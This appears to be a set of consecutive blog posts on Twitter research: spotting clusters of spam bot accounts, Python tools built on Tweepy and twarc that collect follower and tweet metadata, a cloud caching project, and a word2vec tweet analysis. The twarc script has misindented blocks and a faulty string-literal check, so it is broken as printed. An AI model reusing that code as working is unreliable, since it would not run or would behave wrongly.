My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.

The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.

After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.

Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Just a few of the clusters weren’t “flower” shaped. Here’s a few zooms of the graph.

 

Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:

Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.

One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:

As you can see, this group has less new accounts in it than older ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason why there are fewer new accounts in this network is because Twitter’s automation seems to be able to flag behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts on the graphs above were restricted or suspended.

Here are a few more breakdowns – Tweets published, likes, followers and following.

Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets. 🙂

So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:

Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.

If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.



How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name an be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(userids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime, date, time, timedelta
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with io.open(filename, "w", encoding="utf-8") as f:
        f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
        try:
            with io.open(filename, "r", encoding="utf-8") as f:
                ret = json.load(f)
        except:
            pass
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    load_fn = None
    save_fn = None
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
    else:
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
    else:
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match = re.search(match_expression, time_string)
    if match is not None:
        first_bit = match.group(1)
        second_bit = match.group(2)
        last_bit = match.group(3)
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) / 100
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("\r")
        sys.stdout.flush()
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches))
        sys.stdout.flush()
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = (map(lambda t: t._json, users_list))
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max/num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.iteritems():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {} 
                    id_str = user["id_str"] 
                    entry[id_str] = {} 
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"] 
                    for f in fields: 
                        if f in user: 
                            entry[id_str][f] = user[f] 
                    labels[label].append(entry) 
    return labels

if __name__ == "__main__": 
    account_list = [] 
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")
        sys.exit(0)

    consumer_key=""
    consumer_secret=""
    access_token=""
    access_token_secret=""

    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print
        print("\t\tFollower age ranges")
        print("\t\t===================")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.iteritems()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.iteritems():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print("\t\tMost common friends counts")
        print("\t\t==========================")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump

realdonaldtrump_age_ranges

Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here’s the top friends_count values of those accounts:

realdonaldtrump_friends_counts

Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts. However, not in as large of a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account. And we’re not. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump, and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (and hence the tool only collected data for 4997 accounts.)

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s full list of those articles.



Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

fraction_of_top_k_results_compared_to_cache_hit_rates

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!



Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    handle.write(u"Source,Target,Weight\n")
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
              urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in twarc.search(target):
# Output some status as we go, so we know something is happening
      sys.stdout.write("\r")
      sys.stdout.flush()
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
    
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
      else:
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "https://twitter.com/" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
        if interactions is not None:
          for user in interactions:
            mentioned_frequency_dist[user] += 1
            if screen_name not in user_user_graph:
              user_user_graph[screen_name] = {}
            if user not in user_user_graph[screen_name]:
              user_user_graph[screen_name][user] = 1
            else:
              user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
            else:
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Iterate through image URLs, fetching each image if we haven't already
      print
      print("Fetching images.")
      pictures_dir = os.path.join(save_dir, "images")
      if not os.path.exists(pictures_dir):
        print("Creating directory: " + pictures_dir)
        os.makedirs(pictures_dir)
      for url in all_image_urls:
        m = re.search("^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
        if m is not None:
          filename = m.group(1)
          print("Getting picture from: " + url)
          save_path = os.path.join(pictures_dir, filename)
          if not os.path.exists(save_path):
            response = requests.get(url, stream=True)
            with open(save_path, 'wb') as out_file:
              shutil.copyfileobj(response.raw, out_file)
            del response

# Output a bunch of files containing the data we just gathered
      print("Saving data.")
      json_outputs = {"tweets.json": tweets,
                      "urls.json": url_frequency_dist,
                      "hashtags.json": hashtag_frequency_dist,
                      "influencers.json": influencer_frequency_dist,
                      "mentioned.json": mentioned_frequency_dist,
                      "user_user_graph.json": user_user_graph,
                      "user_hashtag_graph.json": user_hashtag_graph,
                      "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
      for name, dataset in json_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
      csv_outputs = {"user_user_graph.csv": user_user_graph,
                     "user_hashtag_graph.csv": user_hashtag_graph,
                     "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
      for name, dataset in csv_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_csv(dataset, filename)

      text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                      "influencers.txt": influencer_frequency_dist,
                      "mentioned.txt": mentioned_frequency_dist,
                      "urls.txt": url_frequency_dist}
      for name, dataset in text_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Since pytorch is gaining a lot of interest, I ran my script against that search term. Here’s some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.

 

Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!



NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”

During the two weeks leading up to the  January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data.)

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed the step once, and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the english alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          for s in stopwords:
            if token == s:
              token = None
        if token is not None:
            if re.search("^[0-9\.\-\s\/]+$", token):
              token = None
        if token is not None:
            cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

